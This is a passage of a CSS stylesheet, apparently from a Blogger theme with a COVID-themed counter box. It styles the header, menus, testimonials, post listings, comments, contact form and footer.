}
.social-color .soundcloud a{
background-color:#ff5400
}
.social-color .behance a{
background-color:#191919
}
.social-color .digg a{
background-color:#1b1a19
}
.social-color .delicious a{
background-color:#0076e8
}
.social-color .codepen a{
background-color:#000
}
.social-color .reddit a{
background-color:#ff4500
}
.social-color .whatsapp a{
background-color:#3fbb50
}
.social-color .snapchat a{
background-color:#ffe700
}
.social-color .email a{
background-color:#888
}
.social-color .external-link a{
background-color:$(dark.color)
}
#header-wrap{
position: relative;
left: 0;
top: 0;
padding: 0;
width: 100%;
height: 68px;
z-index: 1010;
box-shadow: 0 10px 20px rgba(0,0,0,0.19), 0 6px 6px rgba(0,0,0,0.23);
background: #0b177a;
background: -moz-linear-gradient(-45deg, #0b177a 52%, #041aad 100%);
background: -webkit-linear-gradient(-45deg, #0b177a 52%,#041aad 100%);
background: linear-gradient(135deg, #0b177a 52%,#041aad 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#0b177a', endColorstr='#041aad',GradientType=1 );
}
.home #header-wrap {
width: 100%;
height: 68px;
z-index: 1010;
position: absolute;
left: 0;
top: 0;
padding: 0;
background:transparent;
box-shadow:none;
}
.item #header-wrap {
position: relative;
left: 0;
top: 0;
background: #0b177a;
background: -moz-linear-gradient(-45deg, #0b177a 52%, #041aad 100%);
background: -webkit-linear-gradient(-45deg, #0b177a 52%,#041aad 100%);
background: linear-gradient(135deg, #0b177a 52%,#041aad 100%);
filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#0b177a', endColorstr='#041aad',GradientType=1 );
}
#header-wrap .container{
margin:0 auto;
position:relative
}
.header-logo{
position:relative;
float:left;
height:38px;
margin:15px 0 0
}
.header-logo .header-brand{
display:inline-block;
line-height:0
}
.header-logo img{
max-width:100%;
height:38px;
vertical-align:middle
}
.header-logo h1{
color:$(main.menu.color);
font-size:20px;
line-height:38px;
margin:0
}
.header-logo p{
font-size:12px;
margin:5px 0 0
}
#main-menu{
float:right
}
#main-menu .widget,#main-menu .widget > .widget-title{
display:none
}
#main-menu .show-menu{
display:block
}
#main-menu{
position:relative;
height:68px;
z-index:15
}
#main-menu ul > li{
float:left;
position:relative;
margin:0;
padding:0;
transition:color .17s
}
#main-menu ul > li > a{
position:relative;
color:$(main.menu.color);
font-size:12px;
font-weight:600;
text-transform:uppercase;
line-height:68px;
display:inline-block;
text-decoration:none;
padding:0 10px;
margin:0 0 0 5px;
transition:color .17s
}
#main-menu #main-menu-nav > li:last-child > a{
padding:0 0 0 10px
}
#main-menu ul > li > a:hover{
color:$(main.color)
}
#main-menu ul > li > ul{
position:absolute;
float:left;
left:0;
top:68px;
width:180px;
background-color:$(dark.color);
z-index:99999;
margin-top:0;
padding:0;
visibility:hidden;
opacity:0
}
#main-menu ul > li > ul > li > ul{
position:absolute;
float:left;
top:0;
left:100%;
margin-left:0
}
#main-menu ul > li > ul > li{
display:block;
float:none;
position:relative;
transition:background .17s ease
}
#main-menu ul > li > ul > li a{
display:block;
height:34px;
font-size:11px;
color:#ffffff;
line-height:34px;
box-sizing:border-box;
padding:0 15px;
margin:0
}
#main-menu ul > li > ul > li:hover{
background-color:$(main.color)
}
#main-menu ul > li > ul > li:hover > a{
color:#fff
}
#main-menu ul > li.has-sub > a:after{
content:'\f107';
float:right;
font-family:FontAwesome;
font-size:12px;
font-weight:400;
margin:0 0 0 6px
}
#main-menu ul > li > ul > li.has-sub > a:after{
content:'\f105';
float:right;
margin:0
}
#main-menu ul > li:hover > ul,#main-menu ul > li > ul > li:hover > ul{
visibility:visible;
opacity:1
}
#main-menu ul ul{
transition:all .17s ease
}
.mobile-menu-toggle{
display:none;
position:absolute;
right:0;
top:0;
height:68px;
line-height:68px;
z-index:20;
color:$(main.menu.color);
font-size:21px;
font-weight:400;
text-align:left;
cursor:pointer;
padding:0 0 0 20px;
transition:color .17s ease
}
.mobile-menu-toggle:before{
content:"\f0c9";
font-family:FontAwesome
}
.nav-active .mobile-menu-toggle:before{
content:"\f00d";
font-family:FontAwesome
}
.mobile-menu-toggle:hover{
color:$(main.color)
}
.overlay{
display:none;
position:fixed;
top:0;
left:0;
right:0;
bottom:0;
z-index:990;
background:rgba(0,0,0,0.8)
}
.mobile-menu-wrap{
display:none
}
.mobile-menu{
position:absolute;
top:68px;
left:0;
width:100%;
background-color:$(dark.color);
box-sizing:border-box;
visibility:hidden;
z-index:1000;
opacity:0;
border-top:1px solid rgba(255,255,255,0.05);
transition:all .17s ease
}
.nav-active .mobile-menu{
visibility:visible;
opacity:1
}
.mobile-menu > ul{
margin:0
}
.mobile-menu .m-sub{
display:none;
padding:0
}
.mobile-menu ul li{
position:relative;
display:block;
overflow:hidden;
float:left;
width:100%;
font-size:11px;
font-weight:600;
text-transform:uppercase;
line-height:38px;
border-bottom:1px solid rgba(255,255,255,0.05)
}
.mobile-menu ul li:last-child{
border-bottom:0
}
.mobile-menu > ul li ul{
overflow:hidden
}
.mobile-menu ul li a{
color:#ffffff;
padding:0 20px;
display:block;
transition:all .17s ease
}
.mobile-menu ul li a:hover{
color:$(main.color)
}
.mobile-menu ul li.has-sub .submenu-toggle{
position:absolute;
top:0;
right:0;
color:#ffffff;
cursor:pointer;
border-left:1px solid rgba(255,255,255,0.05)
}
.mobile-menu ul li.has-sub .submenu-toggle:after{
content:'\f105';
font-family:FontAwesome;
font-weight:400;
float:right;
width:38px;
font-size:16px;
line-height:38px;
text-align:center;
transition:all .17s ease
}
.mobile-menu ul li.has-sub .submenu-toggle:hover{
color:$(main.color)
}
.mobile-menu ul li.has-sub.show > .submenu-toggle:after{
transform:rotate(90deg)
}
.mobile-menu ul li ul li:first-child{
border-top:1px solid rgba(255,255,255,0.05)
}
.mobile-menu ul li ul li{
background-color:rgba(255,255,255,0.05)
}
#intro-wrap{
display:none;
position:relative;
float:left;
width:100%;
z-index:2;
margin:0
}
#main-intro{
position:relative;
float:left;
width:100%;
height:100%;
background-repeat:no-repeat;
background-size:cover;
background-position:center;
background-color:#f9fafc
}
#main-intro .widget{
height:100%;
width:100%;
display:block;
overflow:hidden
}
.intro-content{
position:absolute;
top:50%;
left:50%;
transform:translate(-50%,-50%);
width:520px;
text-align:center;
margin:0
}
.intro-title{
font-size:37px;
color:$(intro.title);
font-weight:700;
margin:0 0 30px
}
.intro-snippet{
font-size:14px;
line-height:25px;
color:$(intro.text);
margin:0
}
.intro-action a{
display:inline-block;
height:40px;
background-color:$(main.color);
font-size:14px;
color:#fff;
line-height:40px;
padding:0 25px;
margin:30px 0 0;
border-radius:3px;
transition:background .17s ease
}
.intro-action a:hover{
background-color:$(dark.color)
}
#brand-services-wrap{
display:none;
float:left;
width:100%;
background:#f0f6ff url(http://3.bp.blogspot.com/--1Nv76Fp3yY/Xs6TJOVygOI/AAAAAAAAIjA/G_Kstb6pBIIcPNdxYv3OOEgWyRnp114ZwCK4BGAYYCw/s400/corona-2.png) no-repeat -3% 5%;
background-size: 120px;
padding:30px 0
}
#brand-services-wrap .container {
position: relative;
margin: 0 auto;
}
#brand-services-wrap ul {
counter-reset: Serial;
}
#brand-services-wrap li{
float: left;
width: calc(100% / 6);
box-sizing: border-box;
padding: 0 20px;
position:relative;
text-align:center;
}
#brand-services-wrap li h4{
margin: 10px 0 0;
text-transform: uppercase;
color:$(dark.color.two)
}
#brand-services-wrap ul li::after {
content: counter(Serial);
counter-increment: Serial;
background: #3dca93;
border: 1px solid rgba(0,0,0,0.21);
border-bottom-color: rgba(0,0,0,0.34);
text-shadow: 0 1px 0 rgba(0,0,0,0.15);
box-shadow: 0 1px 0 rgba(255,255,255,0.34) inset, 0 2px 0 -1px rgba(0,0,0,0.13), 0 3px 0 -1px rgba(0,0,0,0.08), 0 3px 13px -1px rgba(0,0,0,0.21);
left: calc(50% - 10px);
position: absolute;
top:-15px;
font-size: 15px;
line-height: 1.5rem;
border-radius: 50%;
color: #fff;
height: 1.5rem;
width: 1.5rem;
display: flex;
align-items: center;
justify-content: center;
}
.counter-box {
overflow: hidden;
margin: 0 auto;
padding: 40px 0;
position: relative;
background-image: url(https://1.bp.blogspot.com/-cFauqboXBxI/Xs5py6OjWwI/AAAAAAAAIfk/obIWFMT_m4UI6Mx7hJF-rKaTZfXXIxYdACNcBGAsYHQ/s1600/counter-back.png);
background-repeat: no-repeat;
background-position: 50% 50%;
background-size: 100%;
background-color: #2766bb;
}
.counter-box-wrap {
position:relative;
margin: 0 auto;
background-position: center;
background-color: #ffffff;
border-radius: 10px;
box-shadow: 0 10px 20px rgba(0,0,0,0.19), 0 6px 6px rgba(0,0,0,0.23);
background-image: url(https://1.bp.blogspot.com/-y0_OZ1-f30Q/XsuHjAfdy1I/AAAAAAAAIdM/wGbPioDA_icVsMKhLkmJOkl4G6q3PsSZQCNcBGAsYHQ/s1600/live-pattern.png);
}
.counter-title {
text-align: center;
padding: 20px 0;
background-color: rgba(255, 235, 59, 0.44);
border-radius: 10px 10px 0 0;
}
.counter-title h4 {
background-color: $(dark.color);
border-radius: 0 50px 50px 0;
color: #fff;
display: -webkit-inline-box;
display: -ms-inline-flexbox;
display: inline-flex;
-webkit-box-align: center;
-ms-flex-align: center;
align-items: center;
margin: 0 0 5px;
}
.counter-title h4 span {
font-family: 'Quicksand', sans-serif;
font-weight:700;
}
.counter-title h4 span:first-child {
font-size: 24px;
font-weight: 700;
background-color: #fff;
color: $(main.color);
border-radius: 0 50px 50px 0;
padding:0 5px;
box-sizing:border-box;
}
.counter-title h4 span:last-child {
padding: 0 10px 0 5px;
color:#fff;
}
.counter-title span {
color: $(dark.color);
clear: both;
float: left;
width: 100%;
display: block;
font-size: 10px;
font-weight: 400;
text-transform: uppercase;
letter-spacing: 4.5px;
}
.counter-box-item {
width: 25%;
float: left;
padding: 30px 10px;
box-sizing: border-box;
text-align: center;
color: $(dark.color);
position: relative;
}
.counter-box-item::nth-child(1) {
background-color: rgba(247,139,0,.1);
}
.counter-box-item:nth-child(2) {
background-color: rgba(54,201,123,.1);
}
.counter-box-item:nth-child(3) {
background-color: rgba(204,12,27,.1);
}
.counter-box-item:nth-child(4) {
background-color: rgba(23,56,213,.1);
}
.counter-box-item .lnr {
font-size: 24px;
}
.counter-sora {
color:$(dark.color);
font-size: 42px;
line-height: 42px;
font-weight: 700;
margin: 15px 0;
-webkit-transition: all 300ms linear;
-moz-transition: all 300ms linear;
-o-transition: all 300ms linear;
transition: all 300ms linear;
font-family: Quicksand;
}
.counter-sora-text {
font-size: 14px;
text-transform: uppercase;
letter-spacing: 3px;
color: $(dark.color);
}
#intro-author-wrap{
background: #f0f8ff;
display:none;
position:relative;
float:left;
width:100%;
padding:75px 0 0;
margin:0;
}
#intro-author-wrap .container{
position:relative;
margin:0 auto
}
#intro-author-heading {
width: 100%;
float: left;
display:block;
}
#intro-author-heading .button {
margin: 10px 0 0;
padding: 8px 20px;
background: $(main.color);
display: inline-block;
float: none;
}
.author-intro-widgets {
}
.author-intro-widgets {
margin: 0 -10px;
display: flex;
flex-wrap: wrap;
}
.author-intro-widgets .left-side-widget, .author-intro-widgets .right-side-widget {
display: block;
width: 50%;
padding: 0 10px;
box-sizing: border-box;
position:relative;
}
.author-intro-widgets .right-side-widget {
}
.author-intro-widgets .author-list .widget {
display: block;
list-style: none;
width:100%;
float: left;
margin-bottom: 20px;
box-sizing: border-box;
position:relative;
}
#intro-author-photo{
position:relative;
float:left;
width:100%;
height:400px;
box-sizing:border-box;
padding:0 10px
}
#intro-author-photo .author-image{
position:relative;
display:block;
width:100%;
height:100%;
background-repeat:no-repeat;
background-size:cover;
margin:0
}
#intro-author-heading{
position:relative;
text-align:center;
}
.author-title{
display:block;
font-size:27px;
color:$(title.color);
font-weight:700;
margin:15px 0 20px
}
.author-snippet{
font-size:14px;
line-height:24px;
margin:0
}
#intro-services-wrap{
display:none;
float:left;
width:100%;
background-color:#f8f8f8;
padding:80px 0
}
#intro-services-wrap .container{
position:relative;
margin:0 auto
}
#intro-services{
display:block;
margin:0 -20px
}
#intro-services .widget{
float:left;
width:calc(100% / 3);
box-sizing:border-box;
padding:0 20px
}
.service-content{
display:block;
text-align:center
}
#intro-services .service-icon{
display:inline-block;
width:70px;
height:70px;
text-align:center;
border-radius:100%;
overflow:hidden
}
#intro-services .service-icon img{
display:block;
width:100%;
height:100%;
object-fit:cover;
border-radius:100%;
color:transparent
}
#intro-services .service-icon i{
display:block;
background-color:#f2f2f2;
font-size:30px;
color:$(main.color);
line-height:70px;
font-weight:400;
font-style:normal;
margin:0
}
.author-intro-widgets .author-list .service-icon i {
background-color:transparent;
}
.author-intro-widgets .left-side-widget .service-icon {
float:right;
}
.author-intro-widgets .author-list .service-content-details {
}
.author-intro-widgets .author-list .service-content-details .service-snippet {
color: #5a5a5a;
font-size: 13px;
line-height: 22px;
}
.author-intro-widgets .left-side-widget .service-content {
text-align:right;
}
.author-intro-widgets .author-list .service-icon {
float: left;
margin-right: 15px;
font-size: 30px;
color: #bababa;
position: relative;
background: #fff;
height: 86px;
width: 86px;
border-radius: 50%;
border: 2px solid #2a81ea;
flex-shrink: 0;
text-align: center;
line-height: 86px;
}
.author-intro-widgets .author-list .service-icon:after {
content: "\f00d";
background: #f86168;
left: 0;
position: absolute;
top: 0;
font-family: FontAwesome;
font-size: 15px;
line-height: 1.5rem;
border-radius: 50%;
color: #fff;
height: 1.5rem;
width: 1.5rem;
display: flex;
align-items: center;
justify-content: center;
}
.author-intro-widgets .author-list.right-side-widget .service-icon:after {
content: "\f00c";
background: #3dca93;
}
.author-intro-widgets .author-list .service-content {
text-align: left;
padding: 40px 45px 40px 40px;
-webkit-box-shadow: 0 20px 25px 0 rgba(0,0,0,.08);
box-shadow: 0 20px 25px 0 rgba(0,0,0,.08);
border-radius: 5px;
-webkit-border-radius: 5px;
-ms-border-radius: 5px;
overflow: hidden;
position: relative;
background: #fff;
box-sizing: border-box;
}
.author-intro-widgets .author-list .service-content:before, .author-intro-widgets .author-list .service-content:after {
content: '';
position: absolute;
background-image: url(https://2.bp.blogspot.com/-_rd9JoBTF3g/Xs6qtV_AOxI/AAAAAAAAIjM/Ay2th5S0z8IlV8LUgSPatY4IXLqNEsHPgCK4BGAYYCw/s400/th-bg.png);
width: 167px;
height: 122px;
-webkit-transition: all 0.5s ease-in-out;
-moz-transition: all 0.5s ease-in-out;
-ms-transition: all 0.5s ease-in-out;
-o-transition: all 0.5s ease-in-out;
transition: all 0.5s ease-in-out;
}
.author-intro-widgets .author-list .service-content:before {
left: -45px;
bottom: -45px;
}
.author-intro-widgets .author-list .service-content:after {
right: -45px;
top: -45px;
}
.service-title{
font-size:14px;
color:$(title.color);
font-weight:700;
text-transform:capitalize;
margin:25px 0 15px
}
.author-intro-widgets .author-list .service-title{
margin:0 0 10px;
}
overflow:hidden;
}
.service-snippet{
font-size:14px;
line-height:24px;
margin:0
}
.head-text{
float:left;
width:100%;
text-align:center;
margin:50px 0 50px
}
.head-text .widget-title > h3{
display:block;
font-size:27px;
color:$(title.color);
font-weight:700;
margin:0 0 20px
}
.head-text .widget-content{
font-size:14px;
margin:0
}
#main-wrapper .head-text {
}
#testimonial-wrap{
background:#f0f0f0;
display:none;
float:left;
width:100%;
margin:0
}
#testimonial-wrap .container{
position:relative;
margin:0 auto
}
#testimonial{
display: flex;
flex-wrap: wrap;
margin:15px -15px 0
}
#testimonial .widget{
display: block;
width: 33.33%;
padding: 15px;
box-sizing: border-box;
border-radius: 12px;
text-align:center;
}
#testimonial .widget:first-child, #testimonial .widget:nth-child(2), #testimonial .widget:nth-child(3) {
margin-bottom: 20px;
}
.testi-avatar{
display:inline-block;
width: 200px;
position: relative;
}
.kovid-hex {
overflow: hidden;
display: inline-block;
width: 200px;
height: 170px;
transform: rotate(-30deg) skewX(30deg);
border-radius: .5em;
}
.kovid-hex-inner {
transform: skewX(-30deg) rotate(60deg) skewX(30deg);
cursor: pointer;
display: block;
overflow: hidden;
width: inherit;
height: inherit;
border-radius: inherit;
}
.kovid-hex-inner:before {
transform: skewX(-30deg) rotate(60deg) skewX(30deg);
background: #fff;
content: '';
display: block;
overflow: hidden;
width: inherit;
height: inherit;
border-radius: inherit;
}
.testi-avatar img{
width: 100px;
height: 100px;
position: absolute;
top: 50%;
left: 50%;
margin-left: -50px;
margin-top: -50px;
}
.testi-info{
margin-top: 25px;
overflow:hidden
}
.testi-title{
font-size: 24px;
color:$(dark.color.two);
font-weight:700;
margin:0 0 7px
}
.testi-meta{
font-size:16px;
line-height: 1.75;
color:$(body.text.two)
}
.main .widget{
position:relative
}
.queryMessage{
overflow:hidden;
color:$(title.color);
font-size:13px;
font-weight:400;
padding: 10px;
margin: 0 0 25px;
background-color: #eee;
border: 1px solid #ccc;
box-sizing: border-box;
}
.queryMessage .search-query,.queryMessage .search-label{
font-weight:600;
text-transform:uppercase
}
.queryMessage .search-query:before,.queryMessage .search-label:before{
content:"\201c"
}
.queryMessage .search-query:after,.queryMessage .search-label:after{
content:"\201d"
}
.queryMessage a.show-more{
float: right;
display:inline-block;
color:$(main.color);
text-decoration:underline;
margin:0 0 0 10px
}
.queryEmpty{
font-size:13px;
font-weight:400;
padding:10px 0;
margin:0 0 25px;
text-align:center
}
.blog-post{
display:block;
overflow:hidden;
word-wrap:break-word
}
.index-post-wrap {
position: relative;
float: left;
width: 100%;
}
.grid-posts {
display: flex;
flex-wrap: wrap;
margin: 0 -15px;
}
.index-post{
display: block;
width: 50%;
box-sizing: border-box;
padding: 0 15px;
margin: 0 0 30px;
overflow: visible;
}
.index-post .post-image-wrap{
float: left;
width: 100%;
height: 200px;
margin: 0;
}
.index-post .post-image-wrap .post-image-link{
width:100%;
height:100%;
position:relative;
display:block;
z-index:1;
overflow:hidden
}
.index-post .post-content{
margin:0;
}
.post-image-wrap:hover .post-content{
}
.index-post .post-info{
display: block;
float:left;
width:100%;
padding: 20px 0;
box-sizing: border-box;
min-height: 200px;
border-bottom: 1px dashed #e5e5e5;
}
.index-post .post-info > h2{
font-size:24px;
color:$(title.color);
font-weight:600;
line-height:1.5em;
margin:0 0 10px
}
.index-post .post-info > h2 a{
color:$(title.color);
}
.post-meta{
color:#989898;
font-weight:400;
font-size: 11px;
text-transform: capitalize;
padding:0;
}
.index-post .post-meta .post-author{
}
.index-post .post-meta .post-author:before {
}
.post-meta .post-date{
display:inline-block;
margin:0 7px 0 0
}
.post-meta .post-author, .post-meta .post-date {
float: left;
display: inline-block;
margin: 0 10px 0 0;
}
.post-meta .post-author:before, .post-meta .post-date:before, .post-meta .post-tag:before {
font-family: FontAwesome;
font-weight: 400;
margin: 0 3px 0 0;
}
.post-meta .post-author:before {
content: '\f007';
}
.post-meta .post-date:before {
content: '\f017';
}
.post-meta .post-tag:before {
content: '\f022';
}
.post-meta a {
color: #989898;
transition: color .17s;
}
.post-snippet {
position: relative;
display: block;
overflow: hidden;
font-size: 16px;
line-height: 1.6em;
font-weight: 400;
margin: 7px 0 0;
color: #5a5a5a;
}
.widget iframe,.widget img{
max-width:100%
}
.item-post h1.post-title{
font-size:27px;
color:$(title.color);
line-height:1.5em;
font-weight:700;
position:relative;
display:block;
margin:0 0 15px
}
.static_page .item-post h1.post-title{
margin:0
}
.item-post .post-header .post-meta{
font-size:13px
}
.item-post .post-body{
display:block;
font-size:14px;
line-height:1.6em;
padding:35px 0 0
}
.static_page .item-post .post-body{
padding:35px 0
}
.item-post .post-outer{
padding:0
}
.item-post .post-body img{
max-width:100%
}
.post-footer{
position:relative;
float:left;
width:100%;
margin:35px 0 40px
}
.post-labels{
float:left;
height:auto;
position:relative
}
.post-labels a{
float:left;
height:26px;
background-color:#f9f9f9;
color:#aaa;
font-size:11px;
font-weight:600;
text-transform:uppercase;
line-height:26px;
padding:0 10px;
margin:0 10px 0 0;
border-radius:3px;
transition:all .17s ease
}
.post-labels a:hover{
background-color:$(main.color);
color:#fff
}
.post-share{
position:relative;
float:right;
overflow:hidden;
line-height:0
}
ul.share-links{
position:relative
}
.share-links li{
float:left;
box-sizing:border-box;
margin:0 0 0 5px
}
.share-links li.whatsapp-mobile{
display:none
}
.is-mobile li.whatsapp-desktop{
display:none
}
.is-mobile li.whatsapp-mobile{
display:inline-block
}
.share-links li a{
float:left;
display:inline-block;
width:35px;
height:26px;
color:#fff;
font-size:12px;
text-align:center;
line-height:26px;
border-radius:3px;
transition:all .17s ease
}
.share-links li a:before{
font-size:14px
}
.share-links li a:hover{
background-color:$(main.color);
color:#fff
}
#related-wrap{
margin: 20px 0 30px;
overflow: hidden;
float: left;
width: 100%;
}
#related-wrap .title-wrap {
position: relative;
float: left;
width: 100%;
height: 28px;
background-color: $(main.color);
display: block;
margin: 0 0 20px;
}
#related-wrap .title-wrap > h3 {
display: block;
font-size: 12px;
color: #ffffff;
font-weight: 600;
line-height: 28px;
text-transform: uppercase;
text-align: center;
padding: 0 15px;
margin: 0;
}
#related-wrap .related-tag{
display:none
}
.related-ready{
float:left;
width:100%
}
.related-ready .loader{
height:178px
}
ul.related-posts{
position:relative;
overflow:hidden;
margin:0 -10px;
padding:0
}
.related-posts .related-item{
width:33.33333333%;
position:relative;
overflow:hidden;
float:left;
display:block;
box-sizing:border-box;
padding:0 10px;
margin:0
}
.related-posts .post-image-link{
width:100%;
height:130px;
position:relative;
overflow:hidden;
display:block
}
.related-posts .post-title{
font-size:13px;
font-weight:600;
line-height:1.5em;
display:block;
margin:7px 0 5px
}
.related-posts .post-title a{
color:$(dark.color);
transition:color .17s
}
.related-posts .related-item:hover .post-title a{
color:$(main.color)
}
.related-posts .post-meta{
font-size:12px
}
.post-nav{
position:relative;
overflow:hidden;
display:block;
margin:0
}
.post-nav .nav-link{
display:block;
height:30px;
background-color:#f9f9f9;
font-size:11px;
color:#aaa;
line-height:30px;
text-transform:uppercase;
font-weight:600;
padding:0 25px;
border-radius:3px;
transition:all .17s ease
}
.post-nav .nav-link:hover{
background-color:$(main.color);
color:#fff
}
.post-nav span.nav-link:hover{
background-color:#f8f8f8;
color:#999
}
.next-post-link{
float:left
}
.prev-post-link{
float:right
}
.next-post-link:after{
content:"\f104";
float:left;
font-family:FontAwesome;
font-size:13px;
font-weight:400;
text-transform:none;
margin:0 3px 0 0
}
.prev-post-link:before{
content:"\f105";
float:right;
font-family:FontAwesome;
font-size:13px;
font-weight:400;
text-transform:none;
margin:0 0 0 3px
}
#blog-pager{
float:left;
width:100%;
text-align:center;
margin:16px 0 0
}
.blog-pager a{
display:inline-block;
height:32px;
background-color:$(main.color);
color:#fff;
font-size:14px;
font-weight:400;
line-height:32px;
text-transform:capitalize;
text-align:center;
padding:0 20px;
border-radius:3px;
transition:all .17s ease
}
.blog-pager a:hover{
background-color:$(dark.color)
}
.blog-post-comments{
display:none;
overflow:hidden;
background-color:#f8f8f8;
padding:10px 30px;
margin:0 0 40px
}
#comments{
margin:0
}
#gpluscomments{
float:left!important;
width:100%!important;
margin:0 0 25px!important
}
#gpluscomments iframe{
float:left!important;
width:100%
}
.comments{
display:block;
clear:both;
margin:0
}
.comments > h3{
float:left;
width:100%;
font-size:12px;
font-style:italic;
font-weight:400;
margin:0 0 20px
}
.no-comments > h3{
margin:10px 0 15px
}
.comments .comments-content{
float:left;
width:100%;
margin:0
}
#comments h4#comment-post-message{
display:none
}
.comments .comment-block{
position:relative;
background-color:#fdfdfd;
padding:15px;
margin:0 0 0 55px;
border:1px solid #f2f2f2
}
.comments .comment-block:before{
content:'';
position:absolute;
top:8px;
left:-5px;
width:0;
height:0;
border:5px solid #f2f2f2;
border-top-color:transparent;
border-right-color:transparent;
transform:rotate(45deg)
}
.comments .comment-content{
font-size:13px;
line-height:1.6em;
margin:10px 0
}
.comment-thread .comment{
position:relative;
padding:10px 0 0;
margin:10px 0 0;
list-style:none
}
.comment-thread ol{
padding:0;
margin:0 0 20px
}
.comment-thread ol > li:first-child{
padding:0;
margin:0
}
.comment-thread .avatar-image-container{
position:absolute;
top:10px;
left:0;
width:40px;
height:40px;
overflow:hidden
}
.comment-thread ol > li:first-child > .avatar-image-container{
top:0
}
.avatar-image-container img{
width:100%;
height:100%
}
.comments .comment-header .user{
font-size:14px;
color:$(title.color);
display:inline-block;
font-style:normal;
font-weight:700;
margin:0
}
.comments .comment-header .user a{
color:$(title.color);
transition:color .17s ease
}
.comments .comment-header .user a:hover{
color:$(main.color)
}
.comments .comment-header .icon.user{
display:none
}
.comments .comment-header .icon.blog-author{
display:inline-block;
font-size:12px;
color:$(main.color);
font-weight:400;
vertical-align:top;
margin:0 0 0 5px
}
.comments .comment-header .icon.blog-author:before{
content:'\f058';
font-family:FontAwesome
}
.comments .comment-header .datetime{
float:right;
display:inline-block;
margin:0
}
.comment-header .datetime a{
font-size:12px;
color:#aaa;
font-style:italic
}
.comments .comment-actions{
display:block;
margin:0
}
.comments .comment-actions a{
color:#aaa;
font-size:11px;
font-style:italic;
margin:0 15px 0 0;
transition:color .17s ease
}
.comments .comment-actions a:hover{
color:$(main.color);
text-decoration:underline
}
.loadmore.loaded a{
display:inline-block;
border-bottom:1px solid rgba(0,0,0,0.1);
text-decoration:none;
margin-top:15px
}
.comments .continue{
display:none!important
}
.comments .comment-replies{
padding:0 0 0 55px
}
.thread-expanded .thread-count a,.loadmore{
display:none
}
.comments .footer,.comments .comment-footer{
font-size:13px
}
.comment-form{
margin:0 -7.5px
}
.comment-form > p{
font-size:13px;
padding:10px 0 5px
}
.comment-form > p > a{
color:$(title.color)
}
.comment-form > p > a:hover{
text-decoration:underline
}
.post-body h1,.post-body h2,.post-body h3,.post-body h4,.post-body h5,.post-body h6{
color:$(title.color);
font-weight:700;
margin:0 0 15px
}
.post-body h1,.post-body h2{
font-size:24px
}
.post-body h3{
font-size:21px
}
.post-body h4{
font-size:18px
}
.post-body h5{
font-size:16px
}
.post-body h6{
font-size:13px
}
blockquote{
background-color:#f8f8f8;
font-style:italic;
padding:10px 15px;
margin:0;
border-left:3px solid $(main.color)
}
blockquote:before,blockquote:after{
display:inline-block;
font-family:FontAwesome;
font-weight:400;
font-style:normal;
line-height:1
}
blockquote:before{
content:'\f10d';
margin:0 10px 0 0
}
blockquote:after{
content:'\f10e';
margin:0 0 0 10px
}
.widget .post-body ul,.widget .post-body ol{
line-height:1.5;
font-weight:400
}
.widget .post-body li{
margin:5px 0;
padding:0;
line-height:1.5
}
.post-body ul{
padding:0 0 0 20px
}
.post-body ul li:before{
content:"\f105";
font-family:FontAwesome;
font-size:13px;
font-weight:900;
margin:0 5px 0 0
}
.post-body u{
text-decoration:underline
}
.post-body a{
transition:color .17s ease
}
.post-body strike{
text-decoration:line-through
}
.contact-form-widget form{
font-weight:400
}
.contact-form-name,.contact-form-email{
float:left;
width:calc(50% - 5px);
height:34px;
background-color:rgba(255,255,255,0.01);
font-family:inherit;
font-size:13px;
color:#fff;
line-height:34px;
box-sizing:border-box;
padding:0 10px;
margin:0 0 10px;
border:1px solid rgba(255,255,255,0.05);
border-radius:3px
}
.contact-form-email{
float:right
}
.contact-form-email-message{
float:left;
width:100%;
background-color:rgba(255,255,255,0.01);
font-family:inherit;
font-size:13px;
color:#fff;
box-sizing:border-box;
padding:10px;
margin:0 0 10px;
border:1px solid rgba(255,255,255,0.05);
border-radius:3px
}
.contact-form-button-submit{
float:left;
width:100%;
height:34px;
background-color:$(main.color);
font-family:inherit;
font-size:12px;
color:#fff;
line-height:34px;
font-weight:600;
text-transform:uppercase;
cursor:pointer;
box-sizing:border-box;
padding:0 10px;
margin:0;
border:0;
border-radius:3px;
transition:background .17s ease
}
.contact-form-button-submit:hover{
background-color:rgba(0,0,0,0.5)
}
.contact-form-error-message-with-border,.contact-form-success-message-with-border{
float:left;
width:100%;
background-color:#e74c3c;
color:#f2f2f2;
font-size:11px;
text-align:center;
line-height:11px;
padding:4px 0;
margin:10px 0;
border-radius:3px
}
.contact-form-success-message-with-border{
background-color:#3498db
}
.contact-form-cross{
margin:0 0 0 3px
}
.contact-form-error-message,.contact-form-success-message{
margin:0
}
/* ####### Email Subscribe ######################### */
#footer-wrapper{
position:relative;
overflow:hidden;
background:$(footer.dark.color) url(https://1.bp.blogspot.com/-ohroYsMKFoE/XtoqTSJWN1I/AAAAAAAAIqQ/w-FfbCrE00UjIe59MdgyXF_kLDnqmbdqwCNcBGAsYHQ/s1600/footer-image.jpg);
background-size: cover;
background-position: top;
margin:0
}
#contact-area{
display:none;
overflow:hidden;
padding:60px 0
}
#contact-area > .container{
margin:0 auto
}
#contact-left{
float:left;
width:calc(45% - 40px)
}
#contact-right{
float:right;
width:55%
}
#contact-area .widget-title > h3{
display:block;
color:#f2f2f2;
font-size:20px;
font-weight:700;
margin:0 0 15px
}
.contact-col .Text .widget-content{
font-size:14px;
color:#aaa;
line-height:24px;
margin:0 0 20px
}
.contact-col .LinkList .widget-title{
display:none
}
.contact-item{
display:block;
overflow:hidden;
font-size:14px;
line-height:30px;
margin:15px 0 0
}
.contact-item.item-0{
margin:0
}
.contact-icon{
float:left;
width:30px;
height:30px;
background-color:$(main.color);
font-size:18px;
color:#fff;
line-height:30px;
text-align:center;
margin:0 10px 0 0;
border-radius:3px
}
.item-desc{
color:#aaa
}
#footer-copyright{
display:block;
overflow:hidden;
width:100%;
color:#aaa;
padding:20px 0
}
#footer-copyright > .container{
margin:0 auto
}
#social-footer{
float:right
}
#social-footer .widget{
line-height:30px
}
.social-footer ul{
text-align:center;
overflow:hidden;
display:block
}
.social-footer ul li{
display:inline-block;
margin:0 0 0 14px
}
.social-footer ul li a{
font-size:16px;
color:#aaa;
display:block;
padding:0 3px;
transition:color .17s ease
}
.social-footer ul li:last-child a{
padding-right:0
}
.social-footer ul li a:hover{
color:$(main.color)
}
#footer-copyright .copyright-area{
float:left;
font-size:12px;
line-height:30px;
}
#footer-copyright .copyright-area a{
color:$(main.color)
}
